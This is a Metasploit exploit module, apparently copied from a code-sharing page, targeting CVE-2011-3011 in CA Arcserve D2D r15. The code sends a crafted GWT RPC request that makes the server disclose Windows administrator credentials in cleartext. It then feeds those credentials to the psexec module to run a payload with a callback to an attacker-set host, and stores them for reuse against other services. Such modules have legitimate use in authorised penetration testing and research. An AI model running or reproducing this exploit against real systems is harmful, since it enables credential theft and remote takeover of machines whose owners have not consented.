Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Auxiliary::Report
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',
15
      'Description'    => %q{
16
          This module exploits an information disclosure vulnerability in the CA Arcserve
17
        D2D r15 web server. The information disclosure can be triggered by sending a
18
        specially crafted RPC request to the homepage servlet. This causes CA Arcserve to
19
        disclosure the username and password in cleartext used for authentication. This
20
        username and password pair are Windows credentials with Administrator access.
21
      },
22
      'Author'         =>
23
        [
24
          'bannedit', # metasploit module
25
          'rgod', # original public exploit
26
        ],
27
      'License'        => MSF_LICENSE,
28
      'References'     =>
29
        [
30
          [ 'CVE', '2011-3011' ],
31
          [ 'OSVDB', '74162' ],
32
          [ 'EDB', '17574' ]
33
        ],
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'process'
37
        },
38
      'Privileged'     => true,
39
      'Payload'        =>
40
        {
41
          'Space'    => 1000,
42
          'BadChars' => "\x00\x0d\x0a"
43
        },
44
      'Platform'       => 'win',
45
      'Targets'        =>
46
        [
47
          [ 'Automatic', { } ],
48
        ],
49
      'DisclosureDate' => '2011-07-25',
50
      'DefaultTarget' => 0))
51

52

53
    register_options(
54
      [
55
        Opt::RPORT(8014),
56
      ])
57
  end
58

59
  def service_details
60
    super.merge({
61
      port: 445,
62
      service_name: 'smb',
63
      post_reference_name: self.refname,
64
      last_attempted_at: DateTime.now
65
    })
66
  end
67

68
  def exploit
69
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
70

71
    data  = "5|0|4|"
72
    data << "http://#{datastore['RHOST']}:#{datastore['RPORT']}"
73
    data << "/contents/"
74
    data << "|2C6B33BED38F825C48AE73C093241510|"
75
    data << "com.ca.arcflash.ui.client.homepage.HomepageService"
76
    data << "|getLocalHost|1|2|3|4|0|"
77

78
    cookie = "donotshowgettingstarted=%7B%22state%22%3Atrue%7D"
79

80
    res = send_request_raw({
81
      'uri'     => '/contents/service/homepage',
82
      'version' => '1.1',
83
      'method'  => 'POST',
84
      'cookie'  => cookie,
85
      'data'    => data,
86
      'headers' =>
87
      {
88
        'Content-Type'  => "text/x-gwt-rpc; charset=utf-8",
89
        'Content-Length' => data.length
90
      }
91
    }, 5)
92

93
    if not res
94
      fail_with(Failure::NotFound, 'The server did not respond to our request')
95
    end
96

97
    resp = res.to_s.split(',')
98

99
    user_index = resp.index("\"user\"")
100
    pass_index = resp.index("\"password\"")
101

102
    if user_index.nil? and pass_index.nil?
103
      # Not a vulnerable server (blank user/pass doesn't help us)
104
      fail_with(Failure::NotFound, 'The server did not return credentials')
105
    end
106

107
    user = resp[user_index+1].gsub(/\"/, "")
108
    pass = ""
109

110
    if pass_index
111
      pass = resp[pass_index+1].gsub(/\"/, "")
112
    end
113

114
    srvc = {
115
        :host   => datastore['RHOST'],
116
        :port   => datastore['RPORT'],
117
        :proto  => 'tcp',
118
        :name   => 'http',
119
        :info   => res.headers['Server'] || ""
120
      }
121
    report_service(srvc)
122
    if user.nil? or pass.nil?
123
      print_error("Failed to collect the username and password")
124
      return
125
    end
126

127
    print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
128

129
    # try psexec on the remote host
130
    psexec = framework.exploits.create("windows/smb/psexec")
131
    psexec.register_parent(self)
132

133
    psexec.datastore['PAYLOAD'] = self.datastore['PAYLOAD']
134

135
    if self.datastore['LHOST'] and self.datastore['LPORT']
136
      psexec.datastore['LHOST'] = self.datastore['LHOST']
137
      psexec.datastore['LPORT'] = self.datastore['LPORT']
138
    end
139

140
    psexec.datastore['RHOST'] = self.datastore['RHOST']
141

142
    psexec.datastore['DisablePayloadHandler'] = true
143
    psexec.datastore['SMBPass'] = pass
144
    psexec.datastore['SMBUser'] = user
145

146
    print_status("Attempting to login via windows/smb/psexec")
147

148
    # this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)
149
    begin
150
      psexec.exploit_simple(
151
        'LocalInput'  => self.user_input,
152
        'LocalOutput' => self.user_output,
153
        'Payload'  => psexec.datastore['PAYLOAD'],
154
        'RunAsJob' => true
155
      )
156
    rescue
157
      credential_data = {
158
        user: user,
159
        private_data: pass,
160
        status: Metasploit::Model::Login::Status::INCORRECT
161
      }.merge(service_details)
162
      create_credential_and_login(credential_data)
163

164
      print_error("Login attempt using windows/smb/psexec failed")
165
      print_status("Credentials have been stored and may be useful for authentication against other services.")
166
      # report the auth
167
      return
168
    end
169

170
    # report the auth
171
    credential_data = {
172
        user: user,
173
        private_data: pass,
174
        status: Metasploit::Model::Login::Status::SUCCESSFUL
175
    }.merge(service_details)
176
    create_credential_and_login(credential_data)
177

178
    handler
179
  end
180
end
181

182